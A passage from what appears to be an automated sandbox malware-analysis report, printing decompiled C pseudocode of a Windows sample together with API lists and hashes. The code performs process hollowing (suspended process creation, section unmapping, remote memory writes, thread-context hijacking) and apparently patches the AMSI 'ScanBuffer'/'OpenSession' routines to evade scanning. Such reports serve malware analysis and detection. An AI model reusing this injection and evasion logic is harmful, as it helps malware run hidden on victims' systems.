                                                                                                					_push(0);
                                                                                                					_push(_t494);
                                                                                                					_t186 =  *0x2194420; // 0x0
                                                                                                					asm("cdq");
                                                                                                					asm("adc edx, [esp+0x4]");
                                                                                                					 *0x2194424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
                                                                                                					_t189 =  *0x2194424; // 0x0
                                                                                                					if( *_t189 == 0x4550) {
                                                                                                						E02173518(0x2194310, 0x44);
                                                                                                						E02173518(0x2194300, 0x10);
                                                                                                						0x2194310->cb = 0x44;
                                                                                                						_push(0x2184460);
                                                                                                						_push( *0x2194438);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v28, E02174D64(_v32));
                                                                                                						_push(_v28);
                                                                                                						_t502 =  *0x2194438; // 0x0
                                                                                                						E02174BB0( &_v40, _t502, 0x2184460);
                                                                                                						E02174A98( &_v36, E02174D64(_v40));
                                                                                                						_pop(_t535);
                                                                                                						E02183690(_v36, _t494, _t535, 0);
                                                                                                						_push(0x2184460);
                                                                                                						_push( *0x2194438);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v44, E02174D64(_v48));
                                                                                                						_push(_v44);
                                                                                                						_t503 =  *0x2194438; // 0x0
                                                                                                						E02174BB0( &_v56, _t503, 0x2184460);
                                                                                                						E02174A98( &_v52, E02174D64(_v56));
                                                                                                						_pop(_t540);
                                                                                                						E02183690(_v52, _t494, _t540, 0);
                                                                                                						if(CreateProcessA(E02174D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2194310, 0x2194300) != 0) {
                                                                                                							0x2194354->ContextFlags = 0x10007;
                                                                                                							_t225 =  *0x2194304; // 0x0
                                                                                                							if(GetThreadContext(_t225, 0x2194354) != 0) {
                                                                                                								_push(0x2184460);
                                                                                                								_push( *0x2194438);
                                                                                                								_push("ScanBuffer");
                                                                                                								E02174C24();
                                                                                                								E02174A98( &_v60, E02174D64(_v64));
                                                                                                								_push(_v60);
                                                                                                								_t504 =  *0x2194438; // 0x0
                                                                                                								E02174BB0( &_v72, _t504, 0x2184460);
                                                                                                								E02174A98( &_v68, E02174D64(_v72));
                                                                                                								_pop(_t545);
                                                                                                								E02183690(_v68, _t494, _t545, 0);
                                                                                                								_push(0x2184460);
                                                                                                								_push( *0x2194438);
                                                                                                								_push("OpenSession");
                                                                                                								E02174C24();
                                                                                                								E02174A98( &_v76, E02174D64(_v80));
                                                                                                								_push(_v76);
                                                                                                								_t505 =  *0x2194438; // 0x0
                                                                                                								E02174BB0( &_v88, _t505, 0x2184460);
                                                                                                								E02174A98( &_v84, E02174D64(_v88));
                                                                                                								_pop(_t550);
                                                                                                								E02183690(_v84, _t494, _t550, 0);
                                                                                                								_t255 =  *0x21943f8; // 0x0
                                                                                                								_t257 = 0x2194300->hProcess; // 0x0
                                                                                                								ReadProcessMemory(_t257, _t255 + 8, 0x2194428, 4, 0x2194430);
                                                                                                								_t259 =  *0x2194424; // 0x0
                                                                                                								_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2194428; // 0x0
                                                                                                								if(_t634 != 0) {
                                                                                                									_t261 =  *0x2194424; // 0x0
                                                                                                									_t263 =  *0x2194424; // 0x0
                                                                                                									_t265 = 0x2194300->hProcess; // 0x0
                                                                                                									 *0x219442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
                                                                                                								} else {
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v92, E02174D64(_v96));
                                                                                                									_push(_v92);
                                                                                                									_t517 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v104, _t517, 0x2184460);
                                                                                                									E02174A98( &_v100, E02174D64(_v104));
                                                                                                									_pop(_t613);
                                                                                                									E02183690(_v100, _t494, _t613, 0);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v108, E02174D64(_v112));
                                                                                                									_push(_v108);
                                                                                                									_t518 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v120, _t518, 0x2184460);
                                                                                                									E02174A98( &_v116, E02174D64(_v120));
                                                                                                									_pop(_t618);
                                                                                                									E02183690(_v116, _t494, _t618, 0);
                                                                                                									_t477 =  *0x2194424; // 0x0
                                                                                                									_t479 = 0x2194300->hProcess; // 0x0
                                                                                                									if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
                                                                                                										_t481 =  *0x2194424; // 0x0
                                                                                                										_t483 = 0x2194300->hProcess; // 0x0
                                                                                                										 *0x219442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
                                                                                                									} else {
                                                                                                										_t485 =  *0x2194424; // 0x0
                                                                                                										_t487 =  *0x2194424; // 0x0
                                                                                                										_t489 = 0x2194300->hProcess; // 0x0
                                                                                                										 *0x219442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
                                                                                                									}
                                                                                                								}
                                                                                                								if( *0x219442c != 0) {
                                                                                                									_t495 = E021838A0(_t494, _t641);
                                                                                                									_t269 =  *0x2194424; // 0x0
                                                                                                									_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x219442c; // 0x0
                                                                                                									if(_t637 != 0) {
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v124, E02174D64(_v128));
                                                                                                										_push(_v124);
                                                                                                										_t512 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v136, _t512, 0x2184460);
                                                                                                										E02174A98( &_v132, E02174D64(_v136));
                                                                                                										_pop(_t588);
                                                                                                										E02183690(_v132, _t495, _t588, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v140, E02174D64(_v144));
                                                                                                										_push(_v140);
                                                                                                										_t513 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v152, _t513, 0x2184460);
                                                                                                										E02174A98( &_v148, E02174D64(_v152));
                                                                                                										_pop(_t593);
                                                                                                										E02183690(_v148, _t495, _t593, 0);
                                                                                                										_t412 =  *0x2194424; // 0x0
                                                                                                										_t594 =  *0x219442c; // 0x0
                                                                                                										_t413 =  *0x2194424; // 0x0
                                                                                                										E02183798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
                                                                                                										_t415 =  *0x2194424; // 0x0
                                                                                                										_t596 =  *0x219442c; // 0x0
                                                                                                										 *(_t415 + 0x34) = _t596;
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v156, E02174D64(_v160));
                                                                                                										_push(_v156);
                                                                                                										_t514 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v168, _t514, 0x2184460);
                                                                                                										E02174A98( &_v164, E02174D64(_v168));
                                                                                                										_pop(_t601);
                                                                                                										E02183690(_v164, _t495, _t601, 0);
                                                                                                										_push(0x2184460);
                                                                                                										_push( *0x2194438);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v172, E02174D64(_v176));
                                                                                                										_push(_v172);
                                                                                                										_t515 =  *0x2194438; // 0x0
                                                                                                										E02174BB0( &_v184, _t515, 0x2184460);
                                                                                                										E02174A98( &_v180, E02174D64(_v184));
                                                                                                										_pop(_t606);
                                                                                                										E02183690(_v180, _t495, _t606, 0);
                                                                                                										_push(0);
                                                                                                										_push(_t495);
                                                                                                										_t445 =  *0x2194420; // 0x0
                                                                                                										asm("cdq");
                                                                                                										asm("adc edx, [esp+0x4]");
                                                                                                										_t608 =  *0x2194424; // 0x0
                                                                                                										E02176A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
                                                                                                									}
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v188, E02174D64(_v192));
                                                                                                									_push(_v188);
                                                                                                									_t506 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v200, _t506, 0x2184460);
                                                                                                									E02174A98( &_v196, E02174D64(_v200));
                                                                                                									_pop(_t555);
                                                                                                									E02183690(_v196, _t495, _t555, 0);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v204, E02174D64(_v208));
                                                                                                									_push(_v204);
                                                                                                									_t507 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v216, _t507, 0x2184460);
                                                                                                									E02174A98( &_v212, E02174D64(_v216));
                                                                                                									_pop(_t560);
                                                                                                									E02183690(_v212, _t495, _t560, 0);
                                                                                                									E02174A98( &_v220, "KernelBase");
                                                                                                									 *0x2194468 = E0217CAC8(_v220, _t495, 0x8000);
                                                                                                									_t303 =  *0x2194468; // 0x0
                                                                                                									 *0x219446c = GetProcAddress(_t303, "WriteProcessMemory");
                                                                                                									_t305 =  *0x2194468; // 0x0
                                                                                                									FreeLibrary(_t305);
                                                                                                									_t307 =  *0x2194424; // 0x0
                                                                                                									_t309 =  *0x219442c; // 0x0
                                                                                                									_t310 = 0x2194300->hProcess; // 0x0
                                                                                                									 *0x219446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2194430);
                                                                                                									_t312 =  *0x2194430; // 0x0
                                                                                                									_t313 =  *0x2194424; // 0x0
                                                                                                									_t315 =  *0x219442c; // 0x0
                                                                                                									_t316 = 0x2194300->hProcess; // 0x0
                                                                                                									NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
                                                                                                									_t318 =  *0x2194424; // 0x0
                                                                                                									 *0x2194404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x219442c;
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v224, E02174D64(_v228));
                                                                                                									_push(_v224);
                                                                                                									_t508 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v236, _t508, 0x2184460);
                                                                                                									E02174A98( &_v232, E02174D64(_v236));
                                                                                                									_pop(_t567);
                                                                                                									E02183690(_v232, _t495, _t567, 0);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v240, E02174D64(_v244));
                                                                                                									_push(_v240);
                                                                                                									_t509 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v252, _t509, 0x2184460);
                                                                                                									E02174A98( &_v248, E02174D64(_v252));
                                                                                                									_pop(_t572);
                                                                                                									E02183690(_v248, _t495, _t572, 0);
                                                                                                									_t349 =  *0x2194304; // 0x0
                                                                                                									SetThreadContext(_t349, 0x2194354);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v256, E02174D64(_v260));
                                                                                                									_push(_v256);
                                                                                                									_t510 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v268, _t510, 0x2184460);
                                                                                                									E02174A98( &_v264, E02174D64(_v268));
                                                                                                									_pop(_t577);
                                                                                                									E02183690(_v264, _t495, _t577, 0);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v272, E02174D64(_v276));
                                                                                                									_push(_v272);
                                                                                                									_t511 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v284, _t511, 0x2184460);
                                                                                                									E02174A98( &_v280, E02174D64(_v284));
                                                                                                									_pop(_t582);
                                                                                                									E02183690(_v280, _t495, _t582, 0);
                                                                                                									_t379 =  *0x2194304; // 0x0
                                                                                                									NtResumeThread(_t379);
                                                                                                									E02172C5C(_t495);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_pop(_t526);
                                                                                                				 *[fs:eax] = _t526;
                                                                                                				_push(E02184432);
                                                                                                				return E021748C4( &_v284, 0x46);
                                                                                                			}

                                                                                                0x02183fa1
                                                                                                0x02183fb9
                                                                                                0x02183fc4
                                                                                                0x02183fc5
                                                                                                0x02183fca
                                                                                                0x02183fcf
                                                                                                0x02183fd5
                                                                                                0x02183fe5
                                                                                                0x02183ffd
                                                                                                0x02184008
                                                                                                0x0218400f
                                                                                                0x0218401a
                                                                                                0x02184032
                                                                                                0x0218403d
                                                                                                0x0218403e
                                                                                                0x02184047
                                                                                                0x02184048
                                                                                                0x02184049
                                                                                                0x02184051
                                                                                                0x02184055
                                                                                                0x02184061
                                                                                                0x02184067
                                                                                                0x02184067
                                                                                                0x0218406c
                                                                                                0x02184071
                                                                                                0x02184077
                                                                                                0x02184087
                                                                                                0x0218409f
                                                                                                0x021840aa
                                                                                                0x021840b1
                                                                                                0x021840bc
                                                                                                0x021840d4
                                                                                                0x021840df
                                                                                                0x021840e0
                                                                                                0x021840e5
                                                                                                0x021840ea
                                                                                                0x021840f0
                                                                                                0x02184100
                                                                                                0x02184118
                                                                                                0x02184123
                                                                                                0x0218412a
                                                                                                0x02184135
                                                                                                0x0218414d
                                                                                                0x02184158
                                                                                                0x02184159
                                                                                                0x02184169
                                                                                                0x0218417e
                                                                                                0x02184188
                                                                                                0x02184193
                                                                                                0x02184198
                                                                                                0x0218419e
                                                                                                0x021841a8
                                                                                                0x021841b2
                                                                                                0x021841b8
                                                                                                0x021841be
                                                                                                0x021841c4
                                                                                                0x021841cc
                                                                                                0x021841d5
                                                                                                0x021841db
                                                                                                0x021841e1
                                                                                                0x021841e6
                                                                                                0x021841f4
                                                                                                0x021841f9
                                                                                                0x021841fe
                                                                                                0x02184204
                                                                                                0x02184214
                                                                                                0x0218422c
                                                                                                0x02184237
                                                                                                0x0218423e
                                                                                                0x02184249
                                                                                                0x02184261
                                                                                                0x0218426c
                                                                                                0x0218426d
                                                                                                0x02184272
                                                                                                0x02184277
                                                                                                0x0218427d
                                                                                                0x0218428d
                                                                                                0x021842a5
                                                                                                0x021842b0
                                                                                                0x021842b7
                                                                                                0x021842c2
                                                                                                0x021842da
                                                                                                0x021842e5
                                                                                                0x021842e6
                                                                                                0x021842f0
                                                                                                0x021842f6
                                                                                                0x021842fb
                                                                                                0x02184300
                                                                                                0x02184306
                                                                                                0x02184316
                                                                                                0x0218432e
                                                                                                0x02184339
                                                                                                0x02184340
                                                                                                0x0218434b
                                                                                                0x02184363
                                                                                                0x0218436e
                                                                                                0x0218436f
                                                                                                0x02184374
                                                                                                0x02184379
                                                                                                0x0218437f
                                                                                                0x0218438f
                                                                                                0x021843a7
                                                                                                0x021843b2
                                                                                                0x021843b9
                                                                                                0x021843c4
                                                                                                0x021843dc
                                                                                                0x021843e7
                                                                                                0x021843e8
                                                                                                0x021843ed
                                                                                                0x021843f3
                                                                                                0x02184402
                                                                                                0x02184407
                                                                                                0x02183e25
                                                                                                0x02183bd0
                                                                                                0x02183bae
                                                                                                0x02183a92
                                                                                                0x0218440f
                                                                                                0x02184412
                                                                                                0x02184415
                                                                                                0x0218442a

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218442B,?,?,?,00000000,00000000), ref: 021839C7
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02194310,02194300,OpenSession,02184460,ScanBuffer,02184460), ref: 02183BA7
                                                                                                • GetThreadContext.KERNEL32(00000000,02194354,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02194310,02194300,OpenSession,02184460,ScanBuffer,02184460), ref: 02183BC9
                                                                                                • ReadProcessMemory.KERNEL32(00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354,00000000,00000000,00000000,00000000,00000000), ref: 02183CB3
                                                                                                • NtUnmapViewOfSection.N(00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000), ref: 02183D9D
                                                                                                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430), ref: 02183DC5
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040,00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430), ref: 02183DE9
                                                                                                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354), ref: 02183E14
                                                                                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 0218418E
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,WriteProcessMemory,OpenSession,02184460,ScanBuffer,02184460,00000000,?,?,00003000,00000040,00000000,-00000008,02194428,00000004), ref: 0218419E
                                                                                                • NtProtectVirtualMemory.N(00000000,00000000,?,00000001,00000000), ref: 021841E1
                                                                                                • SetThreadContext.KERNEL32(00000000,02194354,OpenSession,02184460,ScanBuffer,02184460,00000000,00000000,?,00000001,00000000), ref: 021842F6
                                                                                                • NtResumeThread.N(00000000,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354,OpenSession,02184460,ScanBuffer,02184460,00000000,00000000,?,00000001,00000000), ref: 021843F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$LibraryMemory$AllocProcessThread$AddressContextFreeLoadProc$CreateCurrentErrorFlushHandleInetModeModuleMoveOfflineProtectReadResumeSectionUnmapView
                                                                                                • String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
                                                                                                • API String ID: 3085142473-3519499064
                                                                                                • Opcode ID: 7a8a4badfac3a191149301f1f503c82410890468fa530eebebb81c945dddec13
                                                                                                • Instruction ID: b6ad325800c083d449eb42f933e6a48443ec6c060e8799dba9eef01efe8ce8ee
                                                                                                • Opcode Fuzzy Hash: 7a8a4badfac3a191149301f1f503c82410890468fa530eebebb81c945dddec13
                                                                                                • Instruction Fuzzy Hash: 2F421075BC0209DFEB10FB64E980F9F73FAAB85700F5184A5A505A7201DB30AE86CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 55%
                                                                                                			E0218398E(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				char _v84;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				char _v100;
                                                                                                				char _v104;
                                                                                                				char _v108;
                                                                                                				intOrPtr _v112;
                                                                                                				char _v116;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				intOrPtr _v128;
                                                                                                				char _v132;
                                                                                                				char _v136;
                                                                                                				char _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				char _v148;
                                                                                                				char _v152;
                                                                                                				char _v156;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				char _v168;
                                                                                                				char _v172;
                                                                                                				intOrPtr _v176;
                                                                                                				char _v180;
                                                                                                				char _v184;
                                                                                                				char _v188;
                                                                                                				intOrPtr _v192;
                                                                                                				char _v196;
                                                                                                				char _v200;
                                                                                                				char _v204;
                                                                                                				intOrPtr _v208;
                                                                                                				char _v212;
                                                                                                				char _v216;
                                                                                                				char _v220;
                                                                                                				char _v224;
                                                                                                				intOrPtr _v228;
                                                                                                				char _v232;
                                                                                                				char _v236;
                                                                                                				char _v240;
                                                                                                				intOrPtr _v244;
                                                                                                				char _v248;
                                                                                                				char _v252;
                                                                                                				char _v256;
                                                                                                				intOrPtr _v260;
                                                                                                				char _v264;
                                                                                                				char _v268;
                                                                                                				char _v272;
                                                                                                				intOrPtr _v276;
                                                                                                				char _v280;
                                                                                                				char _v284;
                                                                                                				void* _t164;
                                                                                                				short* _t181;
                                                                                                				intOrPtr _t186;
                                                                                                				intOrPtr* _t189;
                                                                                                				void* _t225;
                                                                                                				intOrPtr _t255;
                                                                                                				void* _t257;
                                                                                                				intOrPtr _t259;
                                                                                                				intOrPtr _t261;
                                                                                                				intOrPtr _t263;
                                                                                                				void* _t265;
                                                                                                				intOrPtr _t269;
                                                                                                				struct HINSTANCE__* _t303;
                                                                                                				struct HINSTANCE__* _t305;
                                                                                                				intOrPtr _t307;
                                                                                                				PVOID* _t309;
                                                                                                				void* _t310;
                                                                                                				long* _t312;
                                                                                                				intOrPtr _t313;
                                                                                                				PVOID* _t315;
                                                                                                				void* _t316;
                                                                                                				intOrPtr _t318;
                                                                                                				void* _t349;
                                                                                                				void* _t379;
                                                                                                				intOrPtr _t412;
                                                                                                				intOrPtr _t413;
                                                                                                				intOrPtr _t415;
                                                                                                				intOrPtr _t445;
                                                                                                				intOrPtr _t477;
                                                                                                				void* _t479;
                                                                                                				intOrPtr _t481;
                                                                                                				void* _t483;
                                                                                                				intOrPtr _t485;
                                                                                                				intOrPtr _t487;
                                                                                                				void* _t489;
                                                                                                				intOrPtr _t494;
                                                                                                				void* _t495;
                                                                                                				void* _t496;
                                                                                                				intOrPtr _t497;
                                                                                                				intOrPtr _t502;
                                                                                                				intOrPtr _t503;
                                                                                                				intOrPtr _t504;
                                                                                                				intOrPtr _t505;
                                                                                                				intOrPtr _t506;
                                                                                                				intOrPtr _t507;
                                                                                                				intOrPtr _t508;
                                                                                                				intOrPtr _t509;
                                                                                                				intOrPtr _t510;
                                                                                                				intOrPtr _t511;
                                                                                                				intOrPtr _t512;
                                                                                                				intOrPtr _t513;
                                                                                                				intOrPtr _t514;
                                                                                                				intOrPtr _t515;
                                                                                                				intOrPtr _t517;
                                                                                                				intOrPtr _t518;
                                                                                                				void* _t525;
                                                                                                				intOrPtr _t526;
                                                                                                				void* _t535;
                                                                                                				void* _t540;
                                                                                                				void* _t545;
                                                                                                				void* _t550;
                                                                                                				void* _t555;
                                                                                                				void* _t560;
                                                                                                				void* _t567;
                                                                                                				void* _t572;
                                                                                                				void* _t577;
                                                                                                				void* _t582;
                                                                                                				void* _t588;
                                                                                                				void* _t593;
                                                                                                				PVOID* _t594;
                                                                                                				PVOID* _t596;
                                                                                                				void* _t601;
                                                                                                				void* _t606;
                                                                                                				intOrPtr _t608;
                                                                                                				void* _t613;
                                                                                                				void* _t618;
                                                                                                				intOrPtr _t624;
                                                                                                				intOrPtr _t625;
                                                                                                				void* _t634;
                                                                                                				void* _t637;
                                                                                                				void* _t641;
                                                                                                
                                                                                                				_t641 = __fp0;
                                                                                                				_t620 = __esi;
                                                                                                				_t624 = _t625;
                                                                                                				_t496 = 0x23;
                                                                                                				goto L2;
                                                                                                				L19:
                                                                                                				_pop(_t526);
                                                                                                				 *[fs:eax] = _t526;
                                                                                                				_push(E02184432);
                                                                                                				return E021748C4( &_v284, 0x46);
                                                                                                				L2:
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_t496 = _t496 - 1;
                                                                                                				if(_t496 != 0) {
                                                                                                					goto L2;
                                                                                                				} else {
                                                                                                					_push(__ebx);
                                                                                                					_push(__esi);
                                                                                                					_t494 = __edx;
                                                                                                					_v8 = __eax;
                                                                                                					E02174D54(_v8);
                                                                                                					_push(_t624);
                                                                                                					_push(0x218442b);
                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t625;
                                                                                                					_t164 = E0217304C(0x270e);
                                                                                                					_push(_t164);
                                                                                                					L02183780();
                                                                                                					if(_t164 == 0) {
                                                                                                						E021748F4(0x2194438, 0x2184454);
                                                                                                					} else {
                                                                                                						E021748F4(0x2194438, 0x2184444);
                                                                                                					}
                                                                                                					_push(0x2184460);
                                                                                                					_push( *0x2194438);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v12, E02174D64(_v16));
                                                                                                					_push(_v12);
                                                                                                					_t497 =  *0x2194438; // 0x0
                                                                                                					E02174BB0( &_v24, _t497, 0x2184460);
                                                                                                					E02174A98( &_v20, E02174D64(_v24));
                                                                                                					_pop(_t525);
                                                                                                					E02183690(_v20, _t494, _t525, _t620);
                                                                                                					 *0x2194420 = _t494;
                                                                                                					_t181 =  *0x2194420; // 0x0
                                                                                                					if( *_t181 == 0x5a4d) {
                                                                                                						_push(0);
                                                                                                						_push(_t494);
                                                                                                						_t186 =  *0x2194420; // 0x0
                                                                                                						asm("cdq");
                                                                                                						asm("adc edx, [esp+0x4]");
                                                                                                						 *0x2194424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
                                                                                                						_t189 =  *0x2194424; // 0x0
                                                                                                						if( *_t189 == 0x4550) {
                                                                                                							E02173518(0x2194310, 0x44);
                                                                                                							E02173518(0x2194300, 0x10);
                                                                                                							0x2194310->cb = 0x44;
                                                                                                							_push(0x2184460);
                                                                                                							_push( *0x2194438);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v28, E02174D64(_v32));
                                                                                                							_push(_v28);
                                                                                                							_t502 =  *0x2194438; // 0x0
                                                                                                							E02174BB0( &_v40, _t502, 0x2184460);
                                                                                                							E02174A98( &_v36, E02174D64(_v40));
                                                                                                							_pop(_t535);
                                                                                                							E02183690(_v36, _t494, _t535, 0);
                                                                                                							_push(0x2184460);
                                                                                                							_push( *0x2194438);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v44, E02174D64(_v48));
                                                                                                							_push(_v44);
                                                                                                							_t503 =  *0x2194438; // 0x0
                                                                                                							E02174BB0( &_v56, _t503, 0x2184460);
                                                                                                							E02174A98( &_v52, E02174D64(_v56));
                                                                                                							_pop(_t540);
                                                                                                							E02183690(_v52, _t494, _t540, 0);
                                                                                                							if(CreateProcessA(E02174D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2194310, 0x2194300) != 0) {
                                                                                                								0x2194354->ContextFlags = 0x10007;
                                                                                                								_t225 =  *0x2194304; // 0x0
                                                                                                								if(GetThreadContext(_t225, 0x2194354) != 0) {
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v60, E02174D64(_v64));
                                                                                                									_push(_v60);
                                                                                                									_t504 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v72, _t504, 0x2184460);
                                                                                                									E02174A98( &_v68, E02174D64(_v72));
                                                                                                									_pop(_t545);
                                                                                                									E02183690(_v68, _t494, _t545, 0);
                                                                                                									_push(0x2184460);
                                                                                                									_push( *0x2194438);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v76, E02174D64(_v80));
                                                                                                									_push(_v76);
                                                                                                									_t505 =  *0x2194438; // 0x0
                                                                                                									E02174BB0( &_v88, _t505, 0x2184460);
                                                                                                									E02174A98( &_v84, E02174D64(_v88));
